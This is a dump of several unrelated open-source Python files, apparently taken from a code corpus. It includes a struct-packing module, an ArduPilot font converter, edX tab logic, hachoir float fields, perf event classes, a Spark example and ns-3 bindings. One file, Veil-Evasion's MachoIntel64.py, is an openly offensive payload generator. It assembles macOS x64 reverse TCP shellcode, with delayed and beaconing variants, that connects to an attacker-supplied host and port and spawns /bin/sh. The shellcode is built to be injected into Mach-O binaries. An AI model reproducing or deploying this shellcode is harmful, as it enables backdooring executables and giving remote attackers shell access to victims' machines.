    integer with the same byte representation."""
if size == 8:
MIN_EXP = -1021 # = sys.float_info.min_exp
MAX_EXP = 1024 # = sys.float_info.max_exp
MANT_DIG = 53 # = sys.float_info.mant_dig
BITS = 64
elif size == 4:
MIN_EXP = -125 # C's FLT_MIN_EXP
MAX_EXP = 128 # FLT_MAX_EXP
MANT_DIG = 24 # FLT_MANT_DIG
BITS = 32
else:
raise ValueError("invalid size value")
sign = math.copysign(1.0, x) < 0.0
if math.isinf(x):
mant = 0
exp = MAX_EXP - MIN_EXP + 2
elif math.isnan(x):
mant = 1 << (MANT_DIG - 2) # other values possible
exp = MAX_EXP - MIN_EXP + 2
elif x == 0.0:
mant = 0
exp = 0
else:
m, e = math.frexp(abs(x)) # abs(x) == m * 2**e
exp = e - (MIN_EXP - 1)
if exp > 0:
# Normal case.
mant = round_to_nearest(m * (1 << MANT_DIG))
mant -= 1 << MANT_DIG - 1
else:
# Subnormal case.
if exp + MANT_DIG - 1 >= 0:
mant = round_to_nearest(m * (1 << exp + MANT_DIG - 1))
else:
mant = 0
exp = 0
# Special case: rounding produced a MANT_DIG-bit mantissa.
assert 0 <= mant <= 1 << MANT_DIG - 1
if mant == 1 << MANT_DIG - 1:
mant = 0
exp += 1
# Raise on overflow (in some circumstances, may want to return
# infinity instead).
if exp >= MAX_EXP - MIN_EXP + 2:
raise OverflowError("float too large to pack in this format")
# check constraints
assert 0 <= mant < 1 << MANT_DIG - 1
assert 0 <= exp <= MAX_EXP - MIN_EXP + 2
assert 0 <= sign <= 1
return ((sign << BITS - 1) | (exp << MANT_DIG - 1)) | mant
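# Worked example: float_pack(1.0, 8) == 0x3ff0000000000000 (sign 0, biased
# exponent 1023, mantissa 0), and float_unpack(0x3ff0000000000000, 8, 'big')
# recovers 1.0.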
big_endian_format = {
'x': {'size': 1, 'alignment': 0, 'pack': None, 'unpack': None},
'b': {'size': 1, 'alignment': 0, 'pack': pack_signed_int, 'unpack': unpack_signed_int},
'B': {'size': 1, 'alignment': 0, 'pack': pack_unsigned_int, 'unpack': unpack_int},
'c': {'size': 1, 'alignment': 0, 'pack': pack_char, 'unpack': unpack_char},
's': {'size': 1, 'alignment': 0, 'pack': None, 'unpack': None},
'p': {'size': 1, 'alignment': 0, 'pack': None, 'unpack': None},
'h': {'size': 2, 'alignment': 0, 'pack': pack_signed_int, 'unpack': unpack_signed_int},
'H': {'size': 2, 'alignment': 0, 'pack': pack_unsigned_int, 'unpack': unpack_int},
'i': {'size': 4, 'alignment': 0, 'pack': pack_signed_int, 'unpack': unpack_signed_int},
'I': {'size': 4, 'alignment': 0, 'pack': pack_unsigned_int, 'unpack': unpack_int},
'l': {'size': 4, 'alignment': 0, 'pack': pack_signed_int, 'unpack': unpack_signed_int},
'L': {'size': 4, 'alignment': 0, 'pack': pack_unsigned_int, 'unpack': unpack_int},
'q': {'size': 8, 'alignment': 0, 'pack': pack_signed_int, 'unpack': unpack_signed_int},
'Q': {'size': 8, 'alignment': 0, 'pack': pack_unsigned_int, 'unpack': unpack_int},
'f': {'size': 4, 'alignment': 0, 'pack': pack_float, 'unpack': unpack_float},
'd': {'size': 8, 'alignment': 0, 'pack': pack_float, 'unpack': unpack_float},
}
default = big_endian_format
formatmode = {'<': (default, 'little'),
'>': (default, 'big'),
'!': (default, 'big'),
'=': (default, sys.byteorder),
'@': (default, sys.byteorder)
}
def getmode(fmt):
try:
formatdef, endianness = formatmode[fmt[0]]
index = 1
except (IndexError, KeyError):
formatdef, endianness = formatmode['@']
index = 0
return formatdef, endianness, index
def getNum(fmt, i):
num = None
cur = fmt[i]
while ('0' <= cur) and (cur <= '9'):
        if num is None:
num = int(cur)
else:
num = 10 * num + int(cur)
i += 1
cur = fmt[i]
return num, i
def calcsize(fmt):
"""calcsize(fmt) -> int
Return size of C struct described by format string fmt.
See struct.__doc__ for more on format strings."""
formatdef, endianness, i = getmode(fmt)
num = 0
result = 0
while i < len(fmt):
num, i = getNum(fmt, i)
cur = fmt[i]
try:
format = formatdef[cur]
except KeyError:
raise StructError("%s is not a valid format" % cur)
        if num is not None:
result += num * format['size']
else:
result += format['size']
num = 0
i += 1
return result
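# For example: calcsize('>ihb') == 4 + 2 + 1 == 7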
def pack(fmt, *args):
"""pack(fmt, v1, v2, ...) -> string
Return string containing values v1, v2, ... packed according to fmt.
See struct.__doc__ for more on format strings."""
formatdef, endianness, i = getmode(fmt)
args = list(args)
n_args = len(args)
result = []
while i < len(fmt):
num, i = getNum(fmt, i)
cur = fmt[i]
try:
format = formatdef[cur]
except KeyError:
raise StructError("%s is not a valid format" % cur)
        if num is None:
num_s = 0
num = 1
else:
num_s = num
if cur == 'x':
result += [b'\0' * num]
elif cur == 's':
if isinstance(args[0], bytes):
padding = num - len(args[0])
result += [args[0][:num] + b'\0' * padding]
args.pop(0)
else:
raise StructError("arg for string format not a string")
elif cur == 'p':
if isinstance(args[0], bytes):
padding = num - len(args[0]) - 1
if padding > 0:
result += [bytes([len(args[0])]) + args[0]
[:num - 1] + b'\0' * padding]
else:
if num < 255:
result += [bytes([num - 1]) + args[0][:num - 1]]
else:
result += [bytes([255]) + args[0][:num - 1]]
args.pop(0)
else:
raise StructError("arg for string format not a string")
else:
if len(args) < num:
raise StructError("insufficient arguments to pack")
for var in args[:num]:
result += [format['pack'](var, format['size'], endianness)]
args = args[num:]
num = None
i += 1
if len(args) != 0:
raise StructError("too many arguments for pack format")
return b''.join(result)
def unpack(fmt, data):
"""unpack(fmt, string) -> (v1, v2, ...)
Unpack the string, containing packed C structure data, according
to fmt. Requires len(string)==calcsize(fmt).
See struct.__doc__ for more on format strings."""
formatdef, endianness, i = getmode(fmt)
j = 0
num = 0
result = []
length = calcsize(fmt)
if length != len(data):
raise StructError("unpack str size does not match format")
while i < len(fmt):
num, i = getNum(fmt, i)
cur = fmt[i]
i += 1
try:
format = formatdef[cur]
except KeyError:
raise StructError("%s is not a valid format" % cur)
if not num:
num = 1
if cur == 'x':
j += num
elif cur == 's':
result.append(data[j:j + num])
j += num
elif cur == 'p':
n = data[j]
if n >= num:
n = num - 1
result.append(data[j + 1:j + n + 1])
j += num
else:
for n in range(num):
result += [format['unpack'](data, j, format['size'], endianness)]
j += format['size']
return tuple(result)
def pack_into(fmt, buf, offset, *args):
data = pack(fmt, *args)
buffer(buf)[offset:offset + len(data)] = data
def unpack_from(fmt, buf, offset=0):
size = calcsize(fmt)
data = buffer(buf)[offset:offset + size]
if len(data) != size:
raise error("unpack_from requires a buffer of at least %d bytes"
% (size,))
return unpack(fmt, data)
def _clearcache():
"Clear the internal cache."
# No cache in this implementation
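# Minimal sanity-check sketch for the format semantics documented above.
# It cross-checks this module against the reference implementation, and
# assumes it runs under CPython where the C `struct` module is available.
if __name__ == '__main__':
    import struct as _ref
    for _fmt in ('>i', '<h', '>Q', '>d'):
        assert calcsize(_fmt) == _ref.calcsize(_fmt), _fmt
    print('calcsize cross-check passed')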
|
phamelin/ardupilot
|
refs/heads/master
|
libraries/AP_OSD/fonts/mcm_all.py
|
21
|
#!/usr/bin/env python
def convert(in_file, out_file):
    '''Compile an .mcm font file to binary'''
    with open(in_file) as inp:
        content = inp.readlines()
    content.pop(0)  # drop the MAX7456 header line
    with open(out_file, 'wb') as out:
        for i, line in enumerate(content):
            # each character occupies 64 lines; only the first 54 hold pixel data
            if i % 64 < 54:
                b = int(line, 2)
                out.write(bytearray([b]))
convert('clarity.mcm', 'font0.bin')
convert('clarity_medium.mcm', 'font1.bin')
convert('bfstyle.mcm', 'font2.bin')
convert('bold.mcm', 'font3.bin')
convert('digital.mcm', 'font4.bin')
|
mcardacci/tools_of_the_dark_arts
|
refs/heads/master
|
Veil-Evasion/tools/backdoor/intel/MachoIntel64.py
|
12
|
'''
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import struct
class macho_intel64_shellcode():
"""
Mach-O Intel x64 shellcode Class
"""
def __init__(self, HOST, PORT, jumpLocation=0x0, SUPPLIED_SHELLCODE=None, BEACON=15):
self.HOST = HOST
self.PORT = PORT
self.jumpLocation = jumpLocation
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.BEACON = BEACON
self.shellcode = ""
    def pack_ip_addresses(self):
        hostocts = [int(octet) for octet in self.HOST.split('.')]
        self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
                                  hostocts[2], hostocts[3])
        return self.hostip
def returnshellcode(self):
return self.shellcode
def delay_reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = "\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
self.shellcode2 += "\x48\x05"
        self.shellcode2 += struct.pack("<I", self.BEACON) # add rax, BEACON (seconds)
self.shellcode2 += ("\x48\x89\xC3" # mov rbx, rax
"\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
"\x48\x39\xD8" # cmp rax, rbx
"\x0F\x85\xf0\xff\xff\xff" # jne back to system time
)
self.shellcode2 += ("\xb8"
"\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x49"
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8\x3b\x00\x00\x02"
"\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c"
"\x24\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05"
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
        self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTHREAD offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = ("\xb8"
"\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x49"
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8\x3b\x00\x00\x02"
"\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c"
"\x24\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05"
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
        self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTHREAD offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def beaconing_reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = "\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2" # FORK
#fork
self.shellcode2 += "\x0f\x84" # TO TIME CHECK
self.shellcode2 += "\x6c\x00\x00\x00"
#self.shellcode1 = "\xe9\x6c\x00\x00\x00"
self.shellcode2 += ("\xb8"
"\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x49"
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8\x3b\x00\x00\x02"
"\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c"
"\x24\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05"
)
#TIME CHECK
self.shellcode2 += "\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
self.shellcode2 += "\x48\x05"
        self.shellcode2 += struct.pack("<I", self.BEACON) # add rax, BEACON (seconds)
self.shellcode2 += ("\x48\x89\xC3" # mov rbx, rax
"\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
"\x48\x39\xD8" # cmp rax, rbx
"\x0F\x85\xf0\xff\xff\xff" # jne back to system time
"\xe9\x60\xff\xff\xff\xff" # jmp back to FORK
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
        self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTHREAD offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def user_supplied_shellcode(self):
if self.SUPPLIED_SHELLCODE is None:
            print ("[!] User must provide shellcode for this module (-U)")
return False
else:
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = supplied_shellcode
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
            self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTHREAD offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
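# Minimal usage sketch (hypothetical host/port; assumes this file is
# importable as a module):
#     sc = macho_intel64_shellcode('127.0.0.1', 8080)
#     payload = sc.reverse_shell_tcp()
#     print ("payload length: %d bytes" % len(payload))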
|
olexiim/edx-platform
|
refs/heads/master
|
lms/djangoapps/courseware/tabs.py
|
8
|
"""
This module is essentially a broker to xmodule/tabs.py -- it was originally introduced to
perform some LMS-specific tab display gymnastics for the Entrance Exams feature
"""
from django.conf import settings
from django.utils.translation import ugettext as _
from courseware.access import has_access
from student.models import CourseEnrollment
from xmodule.tabs import CourseTabList
if settings.FEATURES.get('MILESTONES_APP', False):
from milestones.api import get_course_milestones_fulfillment_paths
from util.milestones_helpers import serialize_user
def get_course_tab_list(course, user):
"""
Retrieves the course tab list from xmodule.tabs and manipulates the set as necessary
"""
user_is_enrolled = user.is_authenticated() and CourseEnrollment.is_enrolled(user, course.id)
xmodule_tab_list = CourseTabList.iterate_displayable(
course,
settings,
user.is_authenticated(),
has_access(user, 'staff', course, course.id),
user_is_enrolled
)
    # Entrance Exams feature
    # If the course has an entrance exam, check whether the user has passed it;
    # until they do, hide all of the tabs except for Courseware and Instructor
entrance_exam_mode = False
if settings.FEATURES.get('ENTRANCE_EXAMS', False):
if getattr(course, 'entrance_exam_enabled', False):
course_milestones_paths = get_course_milestones_fulfillment_paths(
unicode(course.id),
serialize_user(user)
)
for __, value in course_milestones_paths.iteritems():
if len(value.get('content', [])):
for content in value['content']:
if content == course.entrance_exam_id:
entrance_exam_mode = True
break
# Now that we've loaded the tabs for this course, perform the Entrance Exam mode work
# Majority case is no entrance exam defined
course_tab_list = []
for tab in xmodule_tab_list:
if entrance_exam_mode:
# Hide all of the tabs except for 'Courseware' and 'Instructor'
# Rename 'Courseware' tab to 'Entrance Exam'
if tab.type not in ['courseware', 'instructor']:
continue
if tab.type == 'courseware':
tab.name = _("Entrance Exam")
course_tab_list.append(tab)
return course_tab_list
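# The entrance-exam filter above reduces to this sketch (names illustrative,
# not part of the edx API):
#     visible = [tab for tab in tabs
#                if not exam_mode or tab.type in ('courseware', 'instructor')]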
|
ustramooner/CouchPotato
|
refs/heads/NzbIndexCom
|
library/hachoir_core/field/float.py
|
84
|
from hachoir_core.field import Bit, Bits, FieldSet
from hachoir_core.endian import BIG_ENDIAN, LITTLE_ENDIAN
import struct
# Make sure that we use right struct types
assert struct.calcsize("f") == 4
assert struct.calcsize("d") == 8
assert struct.unpack("<d", "\x1f\x85\xebQ\xb8\x1e\t@")[0] == 3.14
assert struct.unpack(">d", "\xc0\0\0\0\0\0\0\0")[0] == -2.0
class FloatMantissa(Bits):
def createValue(self):
value = Bits.createValue(self)
return 1 + float(value) / (2 ** self.size)
def createRawDisplay(self):
return unicode(Bits.createValue(self))
class FloatExponent(Bits):
def __init__(self, parent, name, size):
Bits.__init__(self, parent, name, size)
self.bias = 2 ** (size-1) - 1
def createValue(self):
return Bits.createValue(self) - self.bias
def createRawDisplay(self):
return unicode(self.value + self.bias)
def floatFactory(name, format, mantissa_bits, exponent_bits, doc):
size = 1 + mantissa_bits + exponent_bits
class Float(FieldSet):
static_size = size
__doc__ = doc
def __init__(self, parent, name, description=None):
assert parent.endian in (BIG_ENDIAN, LITTLE_ENDIAN)
FieldSet.__init__(self, parent, name, description, size)
if format:
if self._parent.endian == BIG_ENDIAN:
self.struct_format = ">"+format
else:
self.struct_format = "<"+format
else:
self.struct_format = None
def createValue(self):
"""
            Create float value: use struct.unpack() when possible
            (32- and 64-bit floats), or compute it as:
mantissa * (2.0 ** exponent)
This computation may raise an OverflowError.
"""
if self.struct_format:
raw = self._parent.stream.readBytes(
self.absolute_address, self._size//8)
try:
return struct.unpack(self.struct_format, raw)[0]
except struct.error, err:
raise ValueError("[%s] conversion error: %s" %
(self.__class__.__name__, err))
else:
try:
value = self["mantissa"].value * (2.0 ** float(self["exponent"].value))
if self["negative"].value:
return -(value)
else:
return value
except OverflowError:
raise ValueError("[%s] floating point overflow" %
self.__class__.__name__)
def createFields(self):
yield Bit(self, "negative")
yield FloatExponent(self, "exponent", exponent_bits)
if 64 <= mantissa_bits:
yield Bit(self, "one")
yield FloatMantissa(self, "mantissa", mantissa_bits-1)
else:
yield FloatMantissa(self, "mantissa", mantissa_bits)
cls = Float
cls.__name__ = name
return cls
# 32-bit float (standard: IEEE 754/854)
Float32 = floatFactory("Float32", "f", 23, 8,
    "Floating point number: format IEEE 754 in 32 bit")
# 64-bit float (standard: IEEE 754/854)
Float64 = floatFactory("Float64", "d", 52, 11,
"Floating point number: format IEEE 754 in 64 bit")
# 80-bit float (standard: IEEE 754/854)
Float80 = floatFactory("Float80", None, 64, 15,
"Floating point number: format IEEE 754 in 80 bit")
|
ALSchwalm/python-prompt-toolkit
|
refs/heads/master
|
setup.py
|
1
|
#!/usr/bin/env python
import os
from setuptools import setup, find_packages
long_description = open(
os.path.join(
os.path.dirname(__file__),
'README.rst'
)
).read()
setup(
name='prompt_toolkit',
author='Jonathan Slenders',
version='0.47',
license='LICENSE.txt',
url='https://github.com/jonathanslenders/python-prompt-toolkit',
description='Library for building powerful interactive command lines in Python',
long_description=long_description,
packages=find_packages('.'),
    install_requires=[
'pygments',
'six>=1.9.0',
'wcwidth',
],
)
|
jamesjjliao/linux
|
refs/heads/v4.2-rc2-clk
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/EventClass.py
|
4653
|
# EventClass.py
#
# This is a library defining some event type classes, which can be
# used by other scripts to analyze perf samples.
#
# Currently just a few classes are defined as examples: PerfEvent is
# the base class for all perf event samples, PebsEvent is a hardware-based
# Intel x86 PEBS event, and users can add more SW/HW event classes as
# required.
import struct
# Event types, user could add more here
EVTYPE_GENERIC = 0
EVTYPE_PEBS = 1 # Basic PEBS event
EVTYPE_PEBS_LL = 2 # PEBS event with load latency info
EVTYPE_IBS = 3
#
# Currently we have no good way to tell the event type except by the
# size of the raw buffer: a raw PEBS event with load-latency data is
# 176 bytes, while a plain PEBS event is 144 bytes.
#
def create_event(name, comm, dso, symbol, raw_buf):
if (len(raw_buf) == 144):
event = PebsEvent(name, comm, dso, symbol, raw_buf)
elif (len(raw_buf) == 176):
event = PebsNHM(name, comm, dso, symbol, raw_buf)
else:
event = PerfEvent(name, comm, dso, symbol, raw_buf)
return event
class PerfEvent(object):
event_num = 0
def __init__(self, name, comm, dso, symbol, raw_buf, ev_type=EVTYPE_GENERIC):
self.name = name
self.comm = comm
self.dso = dso
self.symbol = symbol
self.raw_buf = raw_buf
self.ev_type = ev_type
PerfEvent.event_num += 1
def show(self):
print "PMU event: name=%12s, symbol=%24s, comm=%8s, dso=%12s" % (self.name, self.symbol, self.comm, self.dso)
#
# Basic Intel PEBS (Precise Event-based Sampling) event, whose raw buffer
# contains the context info when that event happened: the EFLAGS and
# linear IP info, as well as all the registers.
#
class PebsEvent(PerfEvent):
pebs_num = 0
def __init__(self, name, comm, dso, symbol, raw_buf, ev_type=EVTYPE_PEBS):
tmp_buf=raw_buf[0:80]
flags, ip, ax, bx, cx, dx, si, di, bp, sp = struct.unpack('QQQQQQQQQQ', tmp_buf)
self.flags = flags
self.ip = ip
self.ax = ax
self.bx = bx
self.cx = cx
self.dx = dx
self.si = si
self.di = di
self.bp = bp
self.sp = sp
PerfEvent.__init__(self, name, comm, dso, symbol, raw_buf, ev_type)
PebsEvent.pebs_num += 1
del tmp_buf
#
# Intel Nehalem and Westmere support PEBS plus Load Latency info which lie
# in the four 64 bit words write after the PEBS data:
# Status: records the IA32_PERF_GLOBAL_STATUS register value
# DLA: Data Linear Address (EIP)
# DSE: Data Source Encoding, where the latency happens, hit or miss
# in L1/L2/L3 or IO operations
# LAT: the actual latency in cycles
#
class PebsNHM(PebsEvent):
pebs_nhm_num = 0
def __init__(self, name, comm, dso, symbol, raw_buf, ev_type=EVTYPE_PEBS_LL):
tmp_buf=raw_buf[144:176]
status, dla, dse, lat = struct.unpack('QQQQ', tmp_buf)
self.status = status
self.dla = dla
self.dse = dse
self.lat = lat
PebsEvent.__init__(self, name, comm, dso, symbol, raw_buf, ev_type)
PebsNHM.pebs_nhm_num += 1
del tmp_buf
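#
# Minimal construction sketch (synthetic data; assumes Python 2, matching
# this script):
#     raw = struct.pack('18Q', *range(18)) # 18 * 8 = 144 bytes -> PEBS
#     ev = create_event("cycles", "bash", "/bin/bash", "main", raw)
#     ev.show()
#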
|
spark-test/spark
|
refs/heads/master
|
examples/src/main/python/mllib/summary_statistics_example.py
|
128
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from pyspark import SparkContext
# $example on$
import numpy as np
from pyspark.mllib.stat import Statistics
# $example off$
if __name__ == "__main__":
sc = SparkContext(appName="SummaryStatisticsExample") # SparkContext
# $example on$
mat = sc.parallelize(
[np.array([1.0, 10.0, 100.0]), np.array([2.0, 20.0, 200.0]), np.array([3.0, 30.0, 300.0])]
) # an RDD of Vectors
# Compute column summary statistics.
summary = Statistics.colStats(mat)
print(summary.mean()) # a dense vector containing the mean value for each column
print(summary.variance()) # column-wise variance
print(summary.numNonzeros()) # number of nonzeros in each column
# $example off$
sc.stop()
|
avicizhu/Load-balancer
|
refs/heads/master
|
src/propagation/bindings/modulegen__gcc_LP64.py
|
10
|
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.propagation', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## propagation-environment.h (module 'propagation'): ns3::CitySize [enumeration]
module.add_enum('CitySize', ['SmallCity', 'MediumCity', 'LargeCity'])
## propagation-environment.h (module 'propagation'): ns3::EnvironmentType [enumeration]
module.add_enum('EnvironmentType', ['UrbanEnvironment', 'SubUrbanEnvironment', 'OpenAreasEnvironment'])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class]
module.add_class('AttributeConstructionList', import_from_module='ns.core')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct]
module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList'])
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## object.h (module 'core'): ns3::ObjectDeleter [struct]
module.add_class('ObjectDeleter', import_from_module='ns.core')
## propagation-cache.h (module 'propagation'): ns3::PropagationCache<ns3::JakesProcess> [class]
module.add_class('PropagationCache', template_parameters=['ns3::JakesProcess'])
## random-variable.h (module 'core'): ns3::RandomVariable [class]
module.add_class('RandomVariable', import_from_module='ns.core')
## random-variable.h (module 'core'): ns3::SeedManager [class]
module.add_class('SeedManager', import_from_module='ns.core')
## random-variable.h (module 'core'): ns3::SequentialVariable [class]
module.add_class('SequentialVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## random-variable.h (module 'core'): ns3::TriangularVariable [class]
module.add_class('TriangularVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## random-variable.h (module 'core'): ns3::UniformVariable [class]
module.add_class('UniformVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
